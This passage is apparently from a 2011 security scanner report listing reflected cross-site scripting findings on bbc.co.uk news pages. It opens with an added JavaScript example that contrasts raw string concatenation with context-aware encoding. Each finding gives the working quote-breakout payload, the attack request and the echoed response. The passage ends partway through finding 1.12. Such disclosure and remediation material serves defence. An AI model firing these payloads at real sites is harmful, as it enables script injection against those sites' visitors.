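The queryString: 'ac8ab'-alert(1)-'a3dca9f04e7=1' line in the response above shows the whole mechanism described in the issue background, remediation background and issue detail: the raw query string is concatenated into a single-quoted JavaScript string literal inside an inline script block, so a single quote in the parameter name closes the literal and the text that follows is parsed as code. The block below is an added example written for this report; it is not code from the scanner, from the report's author or from bbc.co.uk. It reduces the page object to two fields and uses illustrative function names (renderPageConfigUnsafe, renderPageConfigSafe, jsStringLiteral, evaluateRendered, closesScriptElement); only the payload shape is taken from the finding. It evaluates the rendered script with a stubbed alert to show that the unencoded render executes the injected call while a render that JSON-encodes the value for script context does not, and it adds the check a practitioner wants alongside that fix: JSON.stringify on its own still leaves a literal "</script" in the output, which the HTML parser honours regardless of JavaScript quoting.

```javascript
// Added example (not code from the scanner report or from bbc.co.uk).
// It models the pattern the report evidences: a request-derived value
// copied verbatim into a single-quoted JavaScript string literal inside an
// inline <script> block, contrasted with encoding the value for that
// context. Function names and the page-object shape are illustrative
// assumptions; only the payload shape comes from the report.

// Constructed payload in the shape the scanner used: close the string
// literal, splice in a call, reopen the literal.
const QUOTE_BREAKOUT = "ac8ab'-alert(1)-'a3dca9f04e7=1";

// Constructed payload that stays inside the JS string but would end the
// enclosing <script> element once the browser's HTML parser sees it.
const SCRIPT_BREAKOUT = "x</script><script>alert(2)</script>";

// Vulnerable pattern: raw concatenation into a JS string literal.
function renderPageConfigUnsafe(queryString) {
  return "bbc.fmtj.page = {\n" +
         "    queryString: '" + queryString + "',\n" +
         "    siteName: 'BBC News'\n" +
         "};";
}

// Encode a value for use as a JS string literal inside an HTML <script>
// element. JSON.stringify handles quotes, backslashes and control
// characters; the extra replacements cover what it leaves alone:
// "</" (the HTML parser ends the script element there, regardless of JS
// quoting) and U+2028/U+2029 (line terminators in older JS engines).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/<\//g, "<\\/")
    .replace(/\u2028/g, "\\u2028")
    .replace(/\u2029/g, "\\u2029");
}

// Hardened pattern: same template, encoded value.
function renderPageConfigSafe(queryString) {
  return "bbc.fmtj.page = {\n" +
         "    queryString: " + jsStringLiteral(queryString) + ",\n" +
         "    siteName: 'BBC News'\n" +
         "};";
}

// Run a rendered script body the way the browser would, with `alert`
// replaced by a stub that records whether attacker-controlled code ran.
function evaluateRendered(scriptBody) {
  const alertCalls = [];
  const bbc = { fmtj: {} };
  let page = null;
  let error = null;
  try {
    const run = new Function("bbc", "alert", scriptBody + "\nreturn bbc.fmtj.page;");
    page = run(bbc, (arg) => { alertCalls.push(arg); });
  } catch (e) {
    error = e;
  }
  return { page, alertCalls, error };
}

// Separate check for the HTML-level breakout, which pure JS evaluation
// cannot observe: does the rendered body contain a literal "</script"?
function closesScriptElement(scriptBody) {
  return /<\/script/i.test(scriptBody);
}

// Summary a practitioner can eyeball when running the file directly.
function demo() {
  const unsafe = evaluateRendered(renderPageConfigUnsafe(QUOTE_BREAKOUT));
  const safe = evaluateRendered(renderPageConfigSafe(QUOTE_BREAKOUT));
  return {
    unsafeAlertCalls: unsafe.alertCalls.length,                    // 1: injected alert(1) ran
    safeAlertCalls: safe.alertCalls.length,                        // 0
    safeRoundTrips: safe.page.queryString === QUOTE_BREAKOUT,      // true: value preserved as data
    unsafeClosesScript: closesScriptElement(renderPageConfigUnsafe(SCRIPT_BREAKOUT)), // true
    jsonOnlyClosesScript: closesScriptElement(JSON.stringify(SCRIPT_BREAKOUT)),       // true: JSON alone is not enough
    safeClosesScript: closesScriptElement(renderPageConfigSafe(SCRIPT_BREAKOUT)),     // false
  };
}

console.log(demo());
```

The unsafe render parses the injected value as the expression 'ac8ab' - alert(1) - 'a3dca9f04e7=1', which is why the stubbed alert records a call and queryString ends up as NaN rather than text; the hardened render keeps the same characters but as string data. The closesScriptElement check is deliberately separate because the breakout it detects happens in the HTML parser before any JavaScript runs, so no amount of JS-side evaluation would reveal it.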

1.2. http://www.bbc.co.uk/go/rss/int/news/-/news/12437486 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/12437486

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5432'-alert(1)-'c0f235c4feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/12437486?e5432'-alert(1)-'c0f235c4feb=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=652
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=a48d2535de9a14f3597406b2f1c8a07f8d452cd230d0118fc249105ca6c067f60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48d2535de9a14f3597406b2f1c8a07f8d452cd230d0118fc249105ca6c067f60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476163000,
       editionToServe: 'us',
       queryString: 'e5432'-alert(1)-'c0f235c4feb=1',
       referrer: null,
       section: 'also-in-the-news',
       sectionPath: '/Also in the News',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437486',
       assetTy
...[SNIP]...

1.3. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12427680 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12427680

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a3f5'-alert(1)-'3c65ddbac2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12427680?5a3f5'-alert(1)-'3c65ddbac2f=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=775
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=545dc5553e5a14c3cabc8616e140845d58be0f12b0d0916a04eb0a94c43c0f780Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=545dc5553e5a14c3cabc8616e140845d58be0f12b0d0916a04eb0a94c43c0f780Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 63082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476163000,
       editionToServe: 'us',
       queryString: '5a3f5'-alert(1)-'3c65ddbac2f=1',
       referrer: null,
       section: 'technology',
       sectionPath: '/Technology',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12427680',
       assetType: 'story',
...[SNIP]...

1.4. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12428689 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12428689

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de3f'-alert(1)-'3031a882b87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12428689?6de3f'-alert(1)-'3031a882b87=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=768
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=d49d85055e1a44839a82643d614ffde610b9d039d0d07179dbbb330e880d831a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d49d85055e1a44839a82643d614ffde610b9d039d0d07179dbbb330e880d831a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54646

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476163000,
       editionToServe: 'us',
       queryString: '6de3f'-alert(1)-'3031a882b87=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12428689',
       assetType: 'story',
       
...[SNIP]...

1.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12431066

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df7cf'-alert(1)-'9e8429e408c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12431066?df7cf'-alert(1)-'9e8429e408c=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=c48d9505befa34c3ba22bf115117809f99b0ffd7f02001491b4b939fc14577ea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c48d9505befa34c3ba22bf115117809f99b0ffd7f02001491b4b939fc14577ea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 60841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476163000,
       editionToServe: 'us',
       queryString: 'df7cf'-alert(1)-'9e8429e408c=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12431066',
       assetType: 'story',
       
...[SNIP]...

1.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12431281

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a1a3'-alert(1)-'5e7fdcb884 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12431281?3a1a3'-alert(1)-'5e7fdcb884=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=790
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=549df585eeca44745a377ed0f18a9dcc8c77d14d00003149eb0bc25c5d95dfec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=549df585eeca44745a377ed0f18a9dcc8c77d14d00003149eb0bc25c5d95dfec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64623

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476164000,
       editionToServe: 'us',
       queryString: '3a1a3'-alert(1)-'5e7fdcb884=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12431281',
       assetType: 'story',
       
...[SNIP]...

1.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12434447

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9dcb'-alert(1)-'ed534fa143e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/news/business-12434447?d9dcb'-alert(1)-'ed534fa143e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=742dd5c58e1ae4642a321f34517d4a5bea02dc25c08001995b1b032fe17517ca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=742dd5c58e1ae4642a321f34517d4a5bea02dc25c08001995b1b032fe17517ca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476164000,
       editionToServe: 'us',
       queryString: 'd9dcb'-alert(1)-'ed534fa143e=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434447',
       assetType: 'story',
       
...[SNIP]...

1.8. http://www.bbc.co.uk/news/business-12434447 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434447

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c243e'-alert(1)-'bbc1bb05d9e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12434447?c243e'-alert(1)-'bbc1bb05d9e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:53 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:02:53 GMT
Connection: close
Set-Cookie: BBC-UID=246da5255e3aa45d6b18a5f121fa7644652db01e404021e90b0ba3bfeba472be0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=246da5255e3aa45d6b18a5f121fa7644652db01e404021e90b0ba3bfeba472be0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476173000,
       editionToServe: 'us',
       queryString: 'c243e'-alert(1)-'bbc1bb05d9e=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434447',
       assetType: 'story',
       
...[SNIP]...

1.9. http://www.bbc.co.uk/news/business-12434453 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12434453

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 785fa'-alert(1)-'4f285e0559e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12434453?785fa'-alert(1)-'4f285e0559e=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:53 GMT
Keep-Alive: timeout=10, max=784
Expires: Sat, 12 Feb 2011 02:02:53 GMT
Connection: close
Set-Cookie: BBC-UID=647d95157e0a245d09d559bdf1fb3189fa4be84e3010e1bff25920ebd70d31ec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=647d95157e0a245d09d559bdf1fb3189fa4be84e3010e1bff25920ebd70d31ec0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:53 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476173000,
       editionToServe: 'us',
       queryString: '785fa'-alert(1)-'4f285e0559e=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12434453',
       assetType: 'story',
       
...[SNIP]...

1.10. http://www.bbc.co.uk/news/business-12435838 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12435838

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3faa'-alert(1)-'98d2e1d2cf4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12435838?d3faa'-alert(1)-'98d2e1d2cf4=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:54 GMT
Keep-Alive: timeout=10, max=759
Expires: Sat, 12 Feb 2011 02:02:54 GMT
Connection: close
Set-Cookie: BBC-UID=740dd5b5feaaf45ec84d25e30169e1b396f2602a40d0a2d3070d5a004583ca0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=740dd5b5feaaf45ec84d25e30169e1b396f2602a40d0a2d3070d5a004583ca0e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:54 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476174000,
       editionToServe: 'us',
       queryString: 'd3faa'-alert(1)-'98d2e1d2cf4=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12435838',
       assetType: 'story',
       
...[SNIP]...

1.11. http://www.bbc.co.uk/news/business-12437194 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/business-12437194

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23b62'-alert(1)-'43e4c4839e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/business-12437194?23b62'-alert(1)-'43e4c4839e5=1 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:55 GMT
Keep-Alive: timeout=10, max=794
Expires: Sat, 12 Feb 2011 02:02:55 GMT
Connection: close
Set-Cookie: BBC-UID=542de5c50eea648f1a11325cf1ceb5b361e921cb307081696bfbb382d72d590e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=542de5c50eea648f1a11325cf1ceb5b361e921cb307081696bfbb382d72d590e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:55 GMT; path=/; domain=bbc.co.uk;
Content-Length: 64202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1297476175000,
       editionToServe: 'us',
       queryString: '23b62'-alert(1)-'43e4c4839e5=1',
       referrer: null,
       section: 'business',
       sectionPath: '/Business',
       siteName: 'BBC News',
       siteToServe: 'news',
       siteVersion: 'cream',
       storyId: '12437194',
       assetType: 'story',
       
...[SNIP]...

1.12. http://www.bbc.co.uk/news/education-12429152 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/education-12429152

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a110'-alert(1)-'20c3a9d2c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/education-12429152?8a110'-alert(1)-'20c3a9d2c2=1 HTTP/1.1
